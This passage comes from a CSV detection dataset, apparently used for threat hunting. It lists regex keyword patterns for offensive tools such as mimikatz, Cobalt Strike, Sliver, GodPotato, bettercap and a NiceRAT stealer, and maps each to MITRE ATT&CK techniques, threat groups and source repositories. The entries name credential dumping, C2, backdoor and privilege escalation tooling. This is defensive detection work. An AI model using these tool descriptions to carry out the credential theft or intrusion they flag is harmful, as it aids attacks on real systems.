TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*before-create-implant-callback*",".{0,1000}before\-create\-implant\-callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*before-create-implant-io-bin*",".{0,1000}before\-create\-implant\-io\-bin.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*before-find-implant-chunks*",".{0,1000}before\-find\-implant\-chunks.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*BeichenDream/GodPotato*",".{0,1000}BeichenDream\/GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*BeichenDream/SharpToken*",".{0,1000}BeichenDream\/SharpToken.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*Ben0xA/DoUCMe*",".{0,1000}Ben0xA\/DoUCMe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*benjamin@gentilkiwi.com*",".{0,1000}benjamin\@gentilkiwi\.com.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*beRoot.exe -*",".{0,1000}beRoot\.exe\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*beroot.py -*",".{0,1000}beroot\.py\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*BeRoot-master*",".{0,1000}BeRoot\-master.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*berzerk0*",".{0,1000}berzerk0.{0,1000}","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*besimorhino/powercat*",".{0,1000}besimorhino\/powercat.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*BesoToken.exe list*",".{0,1000}BesoToken\.exe\slist.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*BesoToken-master*",".{0,1000}BesoToken\-master.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*best*phish her*",".{0,1000}best.{0,1000}phish\sher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*bestcrypt2john.py*",".{0,1000}bestcrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bestcryptve2john.py*",".{0,1000}bestcryptve2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*BetterBackdoor*",".{0,1000}BetterBackdoor.{0,1000}","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","277","87","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z" "*bettercap *",".{0,1000}bettercap\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap -iface eth0*",".{0,1000}bettercap\s\-iface\seth0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bettercap.*",".{0,1000}bettercap\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap_.deb*",".{0,1000}bettercap_\.deb.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*bettercap-master.zip*",".{0,1000}bettercap\-master\.zip.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*betterdefaultpasslist*",".{0,1000}betterdefaultpasslist.{0,1000}","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","589","153","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z" "*BetterSafetyKatz.*",".{0,1000}BetterSafetyKatz\..{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BetterXencrypt.ps1*",".{0,1000}BetterXencrypt\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03*",".{0,1000}bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5*",".{0,1000}bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270*",".{0,1000}bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a*",".{0,1000}bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa*",".{0,1000}bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*",".{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1*",".{0,1000}bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f*",".{0,1000}bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922*",".{0,1000}bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d*",".{0,1000}bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*bfnaelmomeimhlpmgjnjophhpkkoljpa*",".{0,1000}bfnaelmomeimhlpmgjnjophhpkkoljpa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bgetprivs*",".{0,1000}bgetprivs.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bhashdump*",".{0,1000}bhashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bhd_enum_dconly*",".{0,1000}bhd_enum_dconly.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bhghoamapcdpbohphigoooaddinpkbai*",".{0,1000}bhghoamapcdpbohphigoooaddinpkbai.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bhhhlbepdkbapadjdnnojkbgioiodbic*",".{0,1000}bhhhlbepdkbapadjdnnojkbgioiodbic.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*bHNhc3MuZXhl*",".{0,1000}bHNhc3MuZXhl.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","base64 lsass.exe","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*bhttp_x64.dll*",".{0,1000}bhttp_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*",".{0,1000}bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bigb0sss/goPassGen*",".{0,1000}bigb0sss\/goPassGen.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*bin/*/PS2EXE/*",".{0,1000}bin\/.{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/addusertogroup.x64*",".{0,1000}bin\/addusertogroup\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*bin/bof_c.o*",".{0,1000}bin\/bof_c\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/bof_nim.o*",".{0,1000}bin\/bof_nim\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 